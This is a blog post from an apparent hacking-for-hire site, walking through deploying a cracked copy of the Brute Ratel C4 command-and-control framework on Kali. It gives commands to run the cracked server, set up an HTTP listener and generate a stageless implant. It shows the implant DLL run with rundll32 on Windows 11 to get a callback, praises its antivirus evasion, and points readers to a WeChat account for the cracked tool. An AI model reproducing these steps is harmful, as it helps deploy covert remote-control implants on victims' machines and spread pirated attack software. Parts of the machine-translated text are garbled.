Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    86383562

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking

In the previous article, we mentioned many C2 framework tools. Such as CS viper, etc. Today I will share with you another fun tool, Brute Ratel C4

Deployment

. After downloading, unzip the file in kali.

1tfjwhmqhhb233.png

Installation environment and certificate (can be omitted)

Enter the adhoc_scripts directory to run, install the environment and generate the certificate

chmod +x install.sh

chmod +x genssl.sh

./install.sh

./genssl.sh 安装环境

生成证书

Next, give brute-ratel-linx64_crack and lib64/commander permissions respectively

chmod +x brute-ratel-linx64_crack

chmod +x lib64/commander pg5stekdjba236.png

Next, start the server./brute-ratel-linx64_crack -ratel -a admin -p password -h 127.0.0.1:50000 -sc cert.pem -sk key.pem After execution, copy the generated key.pem and cert.pem to the tool directory.

pbv1aommzr2237.png

Parameter description: -a Username -p Login password Next, we start the client chmod +x Rungui.sh # Add permissions to the client

./Rungui.sh amlrlobupdq238.png

Modify your port, account password and other information. After you finish, click on the avatar to log in.

5ifcfsyrhby239.png

Add listener

Like tools such as cs, we will create a new listener. Click C4 Profiler - Add http Listener

添加监听

The parameter configuration example is as follows:

stel30tc1ix241.png Note: sleep and jitter are similar to the delay time of CS. They can be adjusted down. After the last line is checked at the end, if the Mazi does not go online at once, it will not be requested.

Generate shell

Click save to get a listener. Right-click this listener and select Stageless to generate the corresponding structure of the horse.

sml3iskkwfp242.png

But for some reason, after the author generates the exe file, he cannot get the shell on the Windows 11 system. Helplessly generated the dll file.

rundll32 kali.dll,main 运行后,成功上线!

At present, the kill-free effect is quite good.

0bxdrd0nitx244.png

Related Operations

命令终端

文件浏览

Of course, there are many fun features. We will update it for you in later articles!

Summary

Advantages: It is very friendly to kill without killing, similar to tools such as CSS, and the entry threshold is low.

Deficiencies: Currently only Windows Payload is supported. I hope to add payloads on other platforms later.

Get the tool, follow the WeChat official account kali notes backend reply (C4)